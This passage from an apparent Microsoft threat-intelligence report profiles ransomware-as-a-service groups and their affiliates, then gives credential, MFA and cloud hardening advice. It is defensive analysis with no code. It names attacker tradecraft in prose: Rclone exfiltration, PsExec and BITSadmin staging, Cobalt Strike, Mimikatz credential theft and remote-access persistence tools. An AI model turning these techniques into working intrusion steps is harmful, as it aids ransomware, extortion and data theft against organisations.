instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind 